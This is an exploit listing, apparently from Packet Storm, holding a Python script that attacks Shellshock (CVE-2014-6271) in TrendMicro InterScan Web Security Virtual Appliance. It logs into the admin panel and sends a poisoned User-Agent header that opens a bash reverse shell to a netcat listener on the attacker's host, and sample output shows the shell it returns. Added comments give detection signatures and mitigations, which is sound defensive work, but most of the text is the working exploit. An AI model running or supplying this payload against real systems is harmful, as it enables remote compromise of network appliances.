Source: packetstorm | Author: Hacker Fantastic | ID: PACKETSTORM:139304
History: Oct 22, 2016 - 12:00 a.m.

TrendMicro InterScan Web Security Virtual Appliance Shellshock

2016-10-22 00:00:00
Hacker Fantastic
packetstormsecurity.com

EPSS: 0.976 (High), percentile 100.0%

`#!/usr/bin/env python  
# TrendMicro InterScan Web Security Virtual Appliance  
# ==================================================  
# InterScan Web Security is a software virtual appliance that   
# dynamically protects against the ever-growing flood of web   
# threats at the Internet gateway exclusively designed to secure   
# you against traditional and emerging web threats at the Internet   
# gateway. The appliance however is shipped with a vulnerable  
# version of Bash susceptible to shellshock (I know right?). An  
# attacker can exploit this vulnerability by calling the CGI  
# shellscript "/cgi-bin/cgiCmdNotify" which can be exploited  
# to perform arbitrary code execution. A limitation of this   
# vulnerability is that the attacker must have credentials for  
# the admin web interface to exploit this flaw. The panel runs  
# over HTTP by default so a man-in-the-middle attack could be  
# used to gain credentials and compromise the appliance.  
#   
# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1  
# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit  
# [-] Authenticating to '192.168.56.101' with 'admin' 'password'  
# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA  
# [-] exploiting shellshock CVE-2014-6271...  
# bash: no job control in this shell  
# bash-4.1$ id  
# uid=498(iscan) gid=499(iscan) groups=499(iscan)  
#   
# -- Hacker Fantastic   
#  
# (https://www.myhackerhouse.com)  
import SimpleHTTPServer  
import subprocess  
import requests  
import sys  
import os  
  
# Run a local netcat listener on TCP port 8080, the same port number that is
# hard-coded in the connect-back target built by shellshock().
# os.system() waits for the command, so this call does not return until nc
# exits.
# NOTE(review): the command line gives nc no bind address, so the listener is
# presumably reachable on every interface of the host running the script, and
# nc accepts whichever peer connects first without any authentication.
# (Indentation of the body was lost in this listing.)
def spawn_listener():  
os.system("nc -l 8080")  
  
# Send the Shellshock (CVE-2014-6271) request to the appliance's admin CGI.
#
# ip      -- appliance address; the request goes to http://<ip>:1812
# session -- JSESSIONID value sent as a cookie (per the header comment, the
#            CGI is only reachable with admin-interface credentials)
# cbip    -- address concatenated, unvalidated, into the /dev/tcp/<cbip>/8080
#            connect-back target inside the header value
#
# Returns nothing: the response is bound to `myreq` and never inspected.
#
# Defender notes:
#  - The User-Agent value starts with the function-definition prefix `() {`,
#    the signature of CVE-2014-6271. That byte sequence has no legitimate use
#    in an HTTP header, so proxy/IDS/WAF rules can match it in any request
#    header, here on requests for /cgi-bin/cgiCmdNotify on port 1812.
#  - The payload makes the appliance open an outbound TCP connection to port
#    8080; egress filtering and flow monitoring on the appliance's network
#    segment expose or block that connect-back.
#  - The root cause is the vulnerable Bash that executes the CGI script.
#    Updating Bash via the vendor's fix removes the flaw; limiting port 1812
#    to a management network and serving the panel over HTTPS protects the
#    credentials the attack depends on.
# (Indentation of the body was lost in this listing.)
def shellshock(ip,session,cbip):  
# Header whose value Bash parses as an exported function definition.
user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}  
cookies = {'JSESSIONID': session}  
print "[-] exploiting shellshock CVE-2014-6271..."  
# Plain HTTP: the session cookie crosses the network unencrypted.
myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies)  
  
# Log in to the admin web interface and return the JSESSIONID session cookie.
#
# ip       -- appliance address; the form is posted to port 1812
# user     -- value sent as the `uid` form field
# password -- value sent as the `passwd` form field
#
# Returns the JSESSIONID cookie value, or None when the first response in the
# redirect chain did not set one.
#
# Security-relevant points:
#  - The login form goes over plain HTTP, so user name and password cross the
#    network in cleartext. This is the exposure the header comment refers to
#    when it says credentials can be captured by a man-in-the-middle.
#  - The password is echoed to stdout together with the user name, so it ends
#    up in terminal scrollback and any captured output.
# (Indentation of the body was lost in this listing.)
def login_http(ip,user,password):  
mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}  
print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password)  
myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata)   
# The cookie is read from the first response in the redirect chain, not from
# the final one. NOTE(review): presumably the login answers with a redirect
# that sets the cookie; if no redirect was followed, `history` is empty and
# this line raises IndexError.
session_cookie = myreq.history[0].cookies.get('JSESSIONID')  
print "[-] JSESSIONID = %s" % session_cookie   
return session_cookie  
  
# Script entry point. Expects four positional arguments:
#   <ip> <user> <pass> <connectback_ip>
# and exits after printing a usage line when fewer are given.
# NOTE(review): indentation was lost in this listing, so the nesting below is
# read from the statements themselves: the process forks, the child (fork
# result 0) runs the listener, and the parent logs in and then sends the
# request.
# The admin password is taken from argv, so it is visible in the process list
# and shell history of the host running the script.
if __name__ == "__main__":  
print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit"  
if len(sys.argv) < 5:  
print "[-] use with <ip> <user> <pass> <connectback_ip>"  
# sys.exit() without an argument exits with status 0, even on a usage error.
sys.exit()  
newRef=os.fork()  
if newRef==0:  
spawn_listener()  
else:  
session = login_http(sys.argv[1],sys.argv[2],sys.argv[3])  
shellshock(sys.argv[1],session,sys.argv[4])  
`